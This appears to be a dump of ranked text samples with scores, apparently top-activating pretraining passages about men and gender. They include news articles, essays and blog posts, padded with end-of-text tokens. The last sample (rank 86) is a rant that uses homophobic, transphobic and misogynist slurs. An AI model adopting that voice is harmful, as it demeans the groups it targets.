sneaky snacks under the desk at work? But McGloin says that men’s experience of eating, and all that goes with it – the shopping, the preparation, the amount they actually consume – is often markedly different to how women encounter their food. + +Men are more likely to eat larger portions, they’re less likely to be aware of healthy eating guidelines, and many don’t regard eating well as an important factor in their long-term health. + +Is it just about complacency then? Even ignorance? McGloin isn’t keen to be so judgmental. Rather, she says, it’s a matter of cultural conditioning, right from the start. + +“You have to be careful about over-generalising, but men are less likely to learn about food in childhood, so they sometimes come into adulthood without +================================================================================ +Rank = 72; Score = 411648.0 +<|begin_of_text|>ESPN Events has announced that Atlanta, Georgia-based BitPay will serve as the new title sponsor of the annual St. Petersburg Bowl — an NCAA-sanctioned post-season college football game that has been taking place since 2008. + +BitPay, renowned for its business of allowing merchants to easily accept bitcoin payments and convert them instantly to local currency, will have the game known as the Bitcoin St. Petersburg Bowl beginning with this year’s game, slated to be held on the 26th of December at Tropicana Field in St. Petersburg, Florida. + +“Our goal is to continue to move bitcoin into the mainstream and sponsoring the St. Petersburg Bowl offers us that opportunity,” noted Mr. Tony Gallippi, Executive Chairman at BitPay. “College football fans and the bitcoin community represent a similar target demographic – tech-savvy men between the ages of 18 and 40.” + +BitPay has secured the game title sponsor opportunity for three years until the December game in 2016. + +Aired nationally on ESPN — a major sports network — the St. Petersburg Bowl game is watched by many sports fans (particularly those interested in football, quite obviously), and BitPay’s hoping to use the opportunity to “further promote interest in the digital currency on a national scale.” + +“We’re extremely excited to welcome BitPay to college football and our bowl home in St. Petersburg,” says Brett Dulaney, who heads the St. Petersburg Bowl. “We look forward to a long and mutually beneficial arrangement.” + +Previous sponsors of the St. Petersburg bowl include magicJack (voice over IP service) and Beef ‘O’ Brady’s, a sports bar/restaurant franchise. + +Tickets to the game will be available via traditional channels (such as TicketMaster), but also by paying with bitcoin (this includes merchandise, too). + +Bitcoin in sports + +This isn’t bitcoin’s first encounter with sports. + +Earlier this year, NBA team Sacramento Kings announced they would be accepting bitcoin for game tickets and merchandise. And most recently, the San Jose Earthquakes (Major League Soccer) announced they too would be accepting bitcoin — even in-stadium at concession kiosks and in their gift store. + +The St. Petersburg Bowl game kicks off at 8 p.m. local time on December 26th. For more information, visit bitcoinstpetebowl.com.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 73; Score = 409600.0 +<|begin_of_text|>U.S. Marines from Delta Company, Infantry Training Battalion, School of Infantry-East navigate their way through the obstacle course aboard, Camp Geiger, N.C., Oct. 04, 2013. Delta Company is the first company at center with female students. (Photo: Warrant Officer Paul Mancuso, U.S. Marines) Story Highlights Thirteen women taking the latest infantry course + +Services must open combat roles to women who qualify + +One test: Carrying an 85-lb. pack for 10 kilometers or more + +CAMP GEIGER, N.C. — Mist clings to the ground and the sun won't make an appearance for another three hours. The 263 Marines of Delta Company, Infantry Training Battalion, shoulder their bulky packs and set off. + +The air is still cool, but 85-pound packs are heavy. Soon the Marines are sweating through their camouflage uniforms and noncommissioned officers are moving between the two files of Marines, shouting encouragement and encouraging stragglers to keep up. + +The Marine Corps has been training infantrymen here since 1953. This year is different. Among Delta Company's 263 Marines are 13 women who have volunteered to participate in a closely watched experiment into the feasibility of integrating females into the infantry. The infantry is among a handful of military jobs that remain male-only preserves. + +The women, who are shouldering the same packs and wearing the same combat uniforms as the men, are barely distinguishable from the men as they trudge in the darkness. + +"We treat everyone the same," said Staff Sgt. Billy Shinault, a Marine instructor who chatted while working a bolt of chewing tobacco after the hike. "We would be doing them a disservice to lower the standards." + +Shortly before he left office earlier this year, Defense Secretary Leon Panetta ordered the military to lift the ban on women serving in ground combat specialties, such as the infantry and special operations. He left it up to the services to figure out how to put the order into effect. The services have until January 2016 to do so. Exceptions would require approval of the defense secretary. + +Women have been serving in plenty of jobs that have exposed them to combat over the past decade in Iraq and Afghanistan. But ground combat jobs have remained off-limits. These jobs require physical strength, feats of endurance and spending a long time in primitive field conditions. + +The infantry is the leading edge of the ground combat specialties. Its mission is as basic as it is elemental. Infantrymen carry what they need on their backs +================================================================================ +Rank = 74; Score = 407552.0 +<|begin_of_text|>OUCH! James Woods Takes Blowtorch To #NeverTrumper Jeff Flake For Criticizing Trump Rallies + +Senator Jeff Flake (R-AZ) criticized attendees of President Trump’s political rallies Sunday, claiming they represent ‘spasms of a dying party.’ + +“When you look at some of the audiences cheering for Republicans, sometimes, you look out there and you say, ‘those are the spasms of a dying party,’ ” Flake told ABC’s “This Week.” + +“When you look at the lack of diversity, sometimes, and it depends on where you are, obviously, but by and large, we’re appealing to older white men and there are just a limited number of them, and anger and resentment are not a governing philosophy,” Flake added. + +Hollywood star and conservative firebrand James Woods blasted the outgoing lawmaker over his comments. + +“You mean the party that has the Presidency, the House, the Senate, the Supreme Court, the majority of State Legislatures, the majority of State Governors, and is poised the steamroll over the broke Democrats in 2018, 2020, and 2024? You mean THAT dying party? #NumbskullJeffFlake?” + +You mean the party that has the Presidency, the House, the Senate, the Supreme Court, the majority of State Legislatures, the majority of State Governors, and is poised the steamroll over the broke Democrats in 2018, 2020, and 2024? You mean THAT dying party? #NumbskullJeffFlake? https://t.co/TULfAGEvMz — James Woods (@RealJamesWoods) December 25, 2017 + +Ouch. + +Flake made headlines recently after cutting a check for Democrat Senate-elect Doug Jones. After making the political contribution, Flake taunted conservatives by tweeting “country over party”. + +The Hill reports: + +Flake, who has announced he will not seek reelection in 2018, has been a frequent critic of Trump, earning the president’s ire on Twitter. The Arizona senator refused to back Republican Alabama Senate candidate Roy Moore, calling him unfit for office. He wrote a $100 check to Democrat Doug Jones in the race, writing “Country over Party” in the memo line. + +Country over Party pic.twitter.com/JZMTaEYdxQ — Jeff Flake (@JeffFlake) December 5, 2017<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 75; Score = 407552.0 +<|begin_of_text|>I keep seeing the word "meritocracy" pop up, mostly in discussions that seem to have stemmed from Faruk Ateş' "A primer on sexism in the tech industry". Do yourself a favor, don't go googling. It's the same shit: "Sexism isn't real because I'm a woman and no one did the sexism to me!" "Women resent being treated as women instead of being evaluated solely on their capabilities!" "You're a sexist moron!" "Some people called me a sexist moron after my moronic sexist blog post and it hurt my little feelings and I'm leaving the internet!" "You GUYS, remember this is supposed to be a meritocracy." + +Except no. No it fucking isn't. Because a meritocracy is not a real thing. It is a joke. + +The word meritocracy comes from a political satire. It was never meant to be something we should aspire to. It was the opposite, actually, a warning about how we rationalize what we believe we've "earned". If that sentence doesn't seem to you applicable to the tech industry and our cyclical discussions about sexism, racism, and even occasionally classism, go get yourself another cup of coffee. + +There's some dumb bullshit in one of the current crop of reaction posts waxing poetic about "hacker culture," and its freedom of speech and lack of PC dogma. Hacker culture was a bunch of white dudes. Hacker culture is a great example of a meritocracy. Some of the most privileged of the privileged got together and formed a community around the idea that they were smarter than everyone else. They created an arbitrary set of metrics for membership and according to their metrics, they triumphed. This was the first time in the history of the world white men had experienced the elation of peer recognition. + +A meritocracy is not a system for locating and rewarding the best of the best. If it were, the "best of the best" in almost every goddamned industry or group on the planet would not be a clump of white men. I'm having trouble finding good stats on this, but white men are something like 8% of the world's population. When you go to a fucking conference and you look around at all the white dudes, do you really honestly think, "Wow! What a bizarre fucking statistical anomaly it is that basically everyone with the special magic gift of computer programming happened to be born into a teeny tiny little demographic sliver of the population"? Of course you don't. +================================================================================ +Rank = 76; Score = 407552.0 +<|begin_of_text|>Whatever else is said about the murder of 20 elementary school children in Newtown, Conn. last year, let no one say – especially at the Senate Judiciary Committee hearings on gun control today – that those killings were “unimaginable.” Every day, mass killings are imagined, rehearsed, and enacted – virtually – by millions of children and young adults, mostly boys and men, in violent video games. One segment of Bioshock 2, for example, invites players to kill defenseless, cowering girls (called Little Sisters) or lure them into a trap where they are mowed down by a machine gun. + +Adam Lanza didn’t have to imagine the Sandy Hook massacre on his own. Others had already imagined it for him. + +When Wayne LaPierre, head of the National Rifle Association, pointed a finger at video games and media violence during a news conference after the shootings, it was a calculated effort to distract attention from the gun industry and its powerful lobby. As former Congresswoman Gabrielle Giffords and her husband Mark Kelly wrote in their USA Today op-ed announcing the launch of their gun-control superPAC, "We saw from the NRA leadership's defiant and unsympathetic response to the Newtown, Conn., massacre that winning even the most common-sense reforms will require a fight." + +But Mr. LaPierre was also half right. Glock and Bushmaster give troubled teens and young adults like Lanza the means to kill. But antisocial video games and a wider culture of militarism give them the script. + +What LaPierre neglected to say is that the arms industry, the video game industry, and the military are deeply entwined with one another and even, one could argue, allied in values. In many ways, their work together is eroding the distinction between virtual and real killing. + +During the Iraq War, Marines relaxed after conducting search and destroy missions by playing Call of Duty 4 and CounterStrike, fielding the same weapons and tactics. CIA agents and Air Force personnel today kill real people in distant countries using remotely piloted drones, on interfaces modeled on video games, while US soldiers hone tactical combat skills on video game simulators and use Xbox joysticks to control real machines in the battlefield. + +Meanwhile, the video game industry works closely with the military and gun manufacturers to ensure that their virtual weaponry, from the PM-63 submachine gun to the C-130 gunship, behaves just like the real thing. Some game companies have direct contracts with the Department of Defense, manufacturing hardware +================================================================================ +Rank = 77; Score = 405504.0 +<|begin_of_text|>OREM — A group of Brigham Young University students recently used a popular dating application to perform a social experiment on unsuspecting fellow students in Utah Valley. + +Tinder, a mobile dating application for iPhones, has exploded in popularity in recent months. Users swipe through profile pictures of people near them, indicating when they are interested in another person. If the interest is mutual, the two are able to contact one another. + +The app has enough of a following at BYU to have garnered an article in the school's paper about it. Its success in Provo led three BYU students to ask a question: How many men would show up to meet a girl with whom they had had only the briefest of interactions? + +"We weren't sure we'd be willing to do it … We didn't think that many people would. And we were proven wrong," Bowman Bagley, a junior at the school, told the Huffington Post. + +Tinder requires a Facebook profile to log in, so Bagley and his roommates set up an account for a fake 21-year-old named Sammy. They uploaded a few photos taken from Miss Teen USA Kendall Fein's online profile and spent an hour "liking" every guy the app showed them. + +About 250 people were matched with "Sammy," and the roommates messaged each of them about a potential date. + +"I'm going to yogurt shop called yogurtland tonight at 9 in orem with some girl friends if you want to meet up ;)" Sammy wrote. + +Photo: alittlebitoflizzy.wordpress.com + +What happened was something no one expected: about six dozen men showed up at the frozen yogurt shop to meet the fictional young woman. What happened next was described on the blog of a student with a connection to Bagley: + +"We walked toward the door to see groups and groups and groups of guys getting out of their cars, hustling into the building. I could not believe it! They were swarming! Literally swarming!" the blogger, who describes herself as a friend of a friend of Bagley's, wrote. + +"Some were waiting outside, trying to look casual.... Some groups were standing together, looking around, looking cool… Picture a wall full of men standing in a yogurt shop on a Thursday night, with no intent of tasting the yogurt," she continued. + +Bagley told the Huffington Post by the time he deleted the fake profile two days later, he had received multiple messages from those he had fooled — some who had missed out on Yogurtland and wanted to make it up on +================================================================================ +Rank = 78; Score = 403456.0 +<|begin_of_text|>Image caption Despite having the same qualifications as men, recent women graduates earn less, suggests a study + +Female graduates earn thousands of pounds less than their male counterparts, according to a report. + +The pay gap persists even between men and women from the same types of university who studied the same subjects, suggests the study. + +Researchers for the Higher Education Careers Services Unit (Hecsu) analysed how much students who applied to higher education in 2006, earned last year. + +Jane Artess, of Hecsu, said pay distribution was "strikingly uneven". + +This was despite laws designed to ensure equal access to jobs and pay, said Ms Artess, + +The researchers analysed data from a longitudinal study of 17,000 recent graduates called Futuretrack. They found that the take-home pay of more than half of female graduates ranged between £15,000 and £23,999. + +Male lead + +Men were more likely to take home £24,000 and above, they found. + +The analysis did not include part-time workers or the unemployed. + +The data, published in the Hecsu journal Graduate Market Trends, suggested men earned more than women across all degree subject areas, even if more women took those subjects than men. + +"When graduate earnings are examined by subject, it is clear that women earned less than men who studied the same subject," says the article. + +The authors add this is the case across all subject areas, "even where women's participation is greater than men's". + +"Equal opportunity to access jobs and pay has been enshrined in legislation for 40 years, yet Futuretrack found that being female can make a difference to a graduate's earning power", said Ms Artess. + +"It is difficult to see why this is, for example, female graduates of media-related subjects are no more or less numerous than their male counterparts yet their earnings are typically lower. + +"Of the Futuretrack respondents, there were fewer men than women in law, yet there is an even greater male lead on earnings. + +"Since it would be unlawful for employers to pay males and females doing the same job differently, something else must be happening to female graduate earnings. + +"If we look at wages by sector, the male lead is persistent in the public and private sectors, in graduate workplaces and also in graduate and non-graduate job roles. + +"The only area where female pay is equal to males is in the not-for-profit sector," said Ms Artess. + +Trades Union Congress (TUC) general secretary Frances O'Grady described the findings as "very alarming." + +Motherhood +================================================================================ +Rank = 79; Score = 401408.0 +<|begin_of_text|>Field Notes: Meet Honolulu’s Competitive Gamers + +Field Notes explores Honolulu’s vast and varied scenes and subcultures. This month we meet the guys who make money playing video games. + +By Gus Downes + +Photos: Aaron Yoshino + +WHAT THEY DO + +Last October, 40,000 people packed Sangam Stadium in Seoul to watch two teams compete for a $1 million prize. The event? The League of Legends world championship tournament, complete with rock bands, orchestra and fireworks. Multiplayer online gaming is huge worldwide, but nowhere bigger than South Korea, where Chung-Ang University even awards scholarships to top video gamers. + +Honolulu’s equivalent scene lives primarily at a 2,100-square-foot storefront in ‘Aiea, run by Devin Wolery. With the help of a small, active core of employees, PC Gamerz puts on e-sport tournaments at his LAN Center. That’s LAN, as in local area network, which guarantees speedy gameplay by keeping the network small. That’s valuable in games where milliseconds mean the difference between winning and losing. + +Tournaments are held at the ‘Aiea storefront, in the corner of the Ala Moana Microsoft Store and, twice a year, at Hot Import Nights. Teams of four or five sit next to each other, staring at high-definition computer monitors and shouting enemy positions in shorthand that is unintelligible to the uninitiated. + +Wolery, 31 years old, with spiked hair and black-rimmed glasses, has been the driving force in building the local professional gaming scene. When he was 18, Wolery got kicked out of his charter school in Sacramento, Calif. for hacking into his school’s computers. He was unimpressed by their computer security. “The password was ‘charter’ spelled backwards,” he says. After moving to Hawai‘i, he started working 40 hours a week at Circuit City and spending another 40 hours a week playing video games. His father noticed, opened PC Gamerz and put Wolery in charge. Now, he’s running video-game tournaments that draw in a diverse group of 20-something-year-old men. + +THE GAMES + +The most popular game, by far, is League of Legends. Wolery says players log 9,000 hours of the game each month at his store (compared to 1,200 hours for the next three games combined). In the game, players control one of dozens of “champions,” characters with different attributes and attacks. Five-man teams battle each +================================================================================ +Rank = 80; Score = 401408.0 +<|begin_of_text|>Marissa Mayer is leaving Google to become the new CEO of Yahoo. + +Photograph by Paul Zimmerman/Getty Images. + +One evening in the spring of 1999, Marissa Mayer got a recruiting email from a tiny search company. “I was in a long-distance relationship at the time, so I was pathetically eating a bad bowl of pasta in my dorm room by myself on a Friday night,” she once told me. Mayer was then a computer science graduate student at Stanford, and she’d been getting bombarded with offers from some of the world’s biggest tech firms. “I remember I’d told myself, ‘New emails from recruiters—just hit delete.’ ” But Mayer found Google interesting. She’d heard about the firm from one of her professors, and her graduate work—she’d been building a recommendation algorithm for Web pages—meshed with the company’s technological aims. + +On the day Mayer interviewed at Google, the company only had seven employees. Most of them were software engineers, and all of the engineers were men. Google’s founders, Larry Page and Sergey Brin, saw that Mayer would fit right in to the geeky boys’ club (during the interview, they all chatted about a data-analysis method known as k-means clustering), and they quickly offered her a job. Mayer, though, wasn’t instantly sold. + +“I had to think really hard about how to choose between job offers,” she said. Mayer approached the choice analytically. Over spring break, she studied the most successful choices in her life to figure out what they had in common. “I looked across very diverse decisions—everything from deciding where to go to school, what to major in, how to spend your summers—and I realized that there were two things that were true about all of them,” she said. “One was, in each case, I’d chosen the scenario where I got to work with the smartest people I could find. … And the other thing was I always did something that I was a little not ready to do. In each of those cases, I felt a little overwhelmed by the option. I’d gotten myself in a little over my head.” + +After weighing her options, Mayer chose Google. After an amazingly successful 13 years with the company, where she oversaw the look and feel of some of the company’s most high-profile products, she’s decided to move on. On Monday, Mayer announced that she’s going to become the new CEO of Yahoo. (She also revealed that she’s pregnant.) + +Deciding to lead +================================================================================ +Rank = 81; Score = 397312.0 +<|begin_of_text|>Distraught that women are outpacing men in college enrollments, Eagle Forum founder Phyllis Schlafly took to WorldNetDaily this week to float the idea that colleges should enforce a gender quota to even out admissions to the benefit of men. Responding to a 2010 New York Times article, Schlafly wondered if colleges should set male admissions quotas to ensure that student bodies are “half women and half men.” + +Another proposal Schlafly put in the mix is to “stop granting college loans, thereby forcing students to take jobs to pay for their tuition and eliminate time for parties, perhaps even wiping out time for fraternities and sororities.” + +Schlafly also called for colleges to stop enforcing Title IX, which prevents sex discrimination in education, as a way to attract men, alleging that the anti-discrimination measure “removes a primary motivation for young men to go to college, many of whom want to try out for a sport even if they are not good enough to make the team.” + +All of this, the right-wing activist insists, would actually benefit women because it would give them more available men to date.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 82; Score = 397312.0 +<|begin_of_text|>Medieval sports were, for the most part, chances for men to practice their martial skills in less dangerous and destructive ways, and largely relegated women to the role of cheerleaders on the sidelines. There was one sport, however, that welcomed both men and women to the field (literally): falconry. + +Rooted in the ancient world, falconry was used for necessary hunting in the Middle Ages – such as finding food and killing vermin – but it was also an extremely popular sport for the nobility. Falcons and hawks were usually trained to hunt small prey, like rabbits and other birds, as they do in the natural world, but their training was sometimes expanded to include attacking larger prey, like deer, in order to weaken and distract the animals so that hunters and their dogs could finish them off (Stuhmiller, p.701). Unlike boar and stag hunting, falconry did not involve a face-to-face encounter with a dangerous and panicked animal, so it was a much safer sport for respectable medieval ladies to participate in: less physically demanding, less rushed, and less bloody. + +There was a wide range of birds for medieval people to train and use to hunt, including the gyrfalcon, goshawk, and sparrowhawk. A common bird for ladies to hunt with, though, was the peregrine falcon, and not just because grey goes with everything. Peregrines were a good choice for ladies because they are relatively small, therefore lighter to hold on the fist, and they are especially graceful in the air. Peregrines attack their prey by closing their talons into fists and diving, breaking the bones of other birds and knocking them out of the sky. This means that these falcons don’t often have the bloody, feather-shredding battles that some other raptors do (which could also be why some medieval men preferred the drama of hunting with bigger hawks). In order to accomplish this backbreaking feat, peregrines execute spectacular dives in excess of 300 kmph – they are the fastest creatures on the planet. Pretty awesome accessories for medieval ladies to wear on their arms, if you ask me. + +Because falconry allowed for women and men to spend the day riding sedately out into nature and having picnic lunches in full view of dozens of chaperones, it was the perfect opportunity – and excuse – for them to flirt and get to know each other. Soon enough, falconry became inextricably linked to romance, and no +================================================================================ +Rank = 83; Score = 393216.0 +<|begin_of_text|>Bisexuality is the tendency to be sexually attracted to both men and women. To some, this may sound like a superpower doubling one's romantic options (and odds). But in real life, bisexuality can be an awkward to have, creating a challenge truly fitting in with either the “straight" or LGBT communities. + +But most important, bisexuality tends to be quite misunderstood. + +Myths and stereotypes about bisexuality abound, some even contradicting one another. Straight and LGBT people alike can hold such stereotypes, compounding the difficulties bisexual people can have fitting in. Luckily, an increasing number of researchers have been producing research improving our of bisexuality. + +Here are three examples of how science has worked to combat misconceptions about bisexuality: + +Myth 1: "There's no such thing as bisexuality." + +This is especially laughable. How can you tell a group of individuals that they don’t exist? But the idea that all people have to be either straight or gay is pervasive and persistent, especially when it comes to men. Frustratingly, even within the most LGBT-friendly circles, you encounter the idea that “there’s no such thing as a bisexual man.” + +Researchers have quite clearly laid this myth to rest with a study recently published in the Archives of Sexual Behavior(1). Researchers recruited straight, gay, and bisexual men, and exposed them to a variety of erotic film clips. Not only were participants asked to rate their subjective feelings of arousal in response to the clips, they were also connected to physiological equipment that measured changes in genital arousal. As would be expected, heterosexual men responded with much more subjective and genital arousal to films containing women rather than men, and vice versa for gay men. However, bisexual men were aroused relatively similarly by videos of both men and women. They were also more aroused by bisexual clips—for example, two men and one woman—than were the other two groups. Importantly, these differences were in both their reported arousal and the objective measurement of their genital arousal. It is clear from this study that these individuals were not “pretending” to be bisexual. + +Myth 2: "Bisexuality is just a phase." + +With this myth, bisexuality is represented as a state of experimentation or confusion—stereotypically experienced during the college years—that occurs before a person settles on their “true” identity. + +Lisa Diamond has conducted some very sophisticated work on this topic, in which she examined the sexual identities of women over long periods of time. In a +================================================================================ +Rank = 84; Score = 389120.0 +<|begin_of_text|>Yet many of its earliest members are still there. They’re now in their 50s, 60s, and 70s. They’ve been talking to each other every day for 27 years. + +Echo might serve as a kind of Grant and Glueck Study for denizens of virtual communities—a longevity survey that can tell us something about the future of the larger social networks that followed it. How has Echo evolved and changed as its members have moved through life? Does online community mean something different to them, 30 years on? + +119:4) joe rosen 11-APR-2017 21:05 This can go either of two ways (but more likely option 2): 1) ECHO ruined my life -- i.e. I spent all my time here developing “remote” relationships, satisfying some need for “friends” instead of cultivating a “real life”. OR 2) Without ECHO I’d have no friends (or life) at all, because really I was never going to bother hanging out with anyone in “real life” anyway. + +* * * + +When Echo was created, the internet was just beginning to be touted as cool. It was before MySpace or Friendster, before Amazon, before the World Wide Web. There was still no faith that the internet had any commercial potential, and Echo’s founder, Stacy Horn, a former telecommunications analyst at Mobil, failed to attract investors to her project, and had to start it with her life savings of $20,000. For the first few years, it was run from her fifth-floor walk-up apartment; for a while, it graduated to a swanky Tribeca office, but it’s back in Horn’s living room today. + +At its peak, Echo had 2,000 members. Forty percent of them were women, a considerable achievement in an era when somewhere around 90 percent of internet users were men. Twice a month, everyone was invited to a real-life Echo party, and all the people who came could fit into one medium-sized Manhattan bar. + +Horn wasn’t just the owner, but a daily participant, talking openly about her personal problems, her favorite TV shows, what she had for lunch. She dated several Echoids, including my husband, who dated at least a dozen others. The atmosphere was incestuous, intimate, intense. At 3 a.m., despairing Echoids would log in to share their existential doubts; at 3 p.m., they’d talk about the conversation they had at +================================================================================ +Rank = 85; Score = 389120.0 +<|begin_of_text|>Science fiction is no longer a boy’s game, if it ever was, as the thousands of women who attended this year's San Diego geekfest Comic-Con can attest. Women are watching, writing, acting in and making sci fi and fantasy – and, if you believe the men behind the "Fake Geek Girls" movement, they’re just doing it for male attention. + +When graphic novelist Tony Harris posted an angry screed on Facebook, decrying the conventionally pretty women who attend conventions in the hopes of snaring an unsuspecting young nerd to toy with, the fake geek girl meme went viral. Harris was simply repeating an argument that has been doing the rounds for years – the "booth babes" and scantily-clad fangirls are there not because they genuinely like science fiction, but to attract men they’d normally never look twice at. One of the biggest targets has been cosplay – what the non-nerdy might term "dressing up". Whilst male fans are free to show up dressed as the Dark Knight himself, attend a con in Catwoman’s leathers and you must be doing it for male attention. A man can wear a bow tie and a fez and he’s in costume. A woman can spend hundreds of pounds or weeks of her time on an exact replica of an outfit a minor character wore onscreen for five minutes, whilst reciting the Prime Directive in Klingon, and she’s an attention-seeking slut. For a subculture that prides itself on individuality, that sounds an awful lot like mainstream misogyny. + +Geekdom is a competitive sphere, whatever your gender. Obscure facts become currency, traded for acceptance or a place in the hierarchy. Fans who come on board at the height of a show’s popularity are looked down upon, because they don’t know the pain of living through those arid, TARDIS-less years between McCoy and Eccleston with only Paul McGann to alleviate the tedium. Women in particular are seen as jumping on a bandwagon, appropriating geek chic – just like female football fans, they’re only interested in the hero’s physique. + +Women’s engagement with media has always been trivialised, from the eighteenth century scorn heaped upon novels to the dismissal of teenage boyband fans, whose attention, it is assumed, must be on the floppy-haired singers, not the music itself. When feminist Doctor Who anthology Chicks Unravel Time was published last year, one of the essays that raised most eyebrows was Laura Mead’s meditation on the Doctor +================================================================================ +Rank = 86; Score = 389120.0 +<|begin_of_text|>The Illusion of Diversity. + +In a world full of Safe Spaces, Trigger warnings, Gender Wage Gaps and Racists. There is one thing the liberal fucktard left will shove in our faces, DIVERSITY. + +The left believes they are Diversity masters because they took a gender studies class (Or as I call it a waste of money class). and hate Cis-gender, Heterosexual, White Men. + +One thing they forgot about Diversity is Diversity of opinions. The diversity of beliefs, Diversity of Speech and Diversity of actions. + +I can’t attend one of these diversity groups (Not that I want to) because I call Myself a Faggot who supports Trump, I don’t believe the USA is inherently racist, I don’t believe we are all Homophobic and most of all I am perceived as White. + +Black, RugMunching, feminist Trannies are their idea of Diversity. + +The left preaches what they don’t even have a grip on. Right wing conservatives (or as they like to call us Old white men that don’t care about Women, LGBT or Blacks) are better than Liberals at Diversity. They have this radical notion that diversity is who they pick and choose based on Skin color, Family, political orientation, and beliefs. + +This idea of Diversity is the basis of Authoritarianism. Selective participation based on the ideas of the leaders, Similar to North Korea where you are assigned a job, a Haircut and you are told to have the same beliefs as your leaders or you and your family will be persecuted. + +But I’m allegedly just a white supremacist, Patriarchy contributor, and Woman hater. No, I just prefer men. FUCK. Can’t I have a preference? + +Stay fabulous and get your feminism 